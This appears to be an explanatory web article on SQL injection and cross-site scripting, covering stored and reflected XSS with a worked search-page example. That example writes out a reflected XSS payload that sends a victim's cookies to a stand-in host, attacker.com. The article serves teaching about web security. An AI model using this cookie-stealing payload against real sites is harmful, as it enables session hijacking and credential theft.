SQL Injection and XSS Security Threats
A SQL injection attack happens when structured query language (SQL) code is injected into forms, cookies, or http headers that do not use data sanitising or validation methods to verify the request. This flaw allows data extraction, changes, or deletion from databases that are connected to websites.
Cross-Site Scripting (XSS)
An XSS attack uses malicious code to redirect users to malicious websites, steal cookies or credentials, or deface websites. This is usually accomplished using malicious scripts that are executed in client browsers as a result of user input, functional statements, client requests, or other expressions.
There are major 2 types of cross site scripting, Stored XSS and Reflected XSS
Stored XSS generally occurs when user input is stored on the target server, such as in a database, in a message forum, visitor log, comment field, etc. And then a victim is able to retrieve the stored data from the web application without that data being made safe to render in the browser.
Reflected XSS occurs when user input is immediately returned by a web application in an error message, search result, or any other response
Considering this through an example-
- Suppose there is a search functionality in your application and let the search url be some like this https://example.com/news?q=data+breach In the search results the website reflects the content of the query that the user searched for, such as: You searched for "data breach"
- If the Search functionality is vulnerable to a reflected cross-site scripting vulnerability, the attacker can send the victim a link such as the below
https://example.com/news?q=<script>document.location='https://attacker.com/log.php?c=' + encodeURIComponent(document.cookie)</script>
- Once the victim clicks on the link, the website will display the following
You searched for "<script>document.location='https://attacker.com/log.php?c=' + document.cookie</script>"
The HTML source code, which is reflecting the attacker's malicious code redirects the victim to a website that is controlled by the attacker, which can then record the user's current cookie for example.com as GET parameter. To sum it up, the main difference between a SQL and XSS injection attack is that SQL injection attacks are used to steal information from databases whereas XSS attacks are mainly used to redirect users to websites where attackers can steal data from them.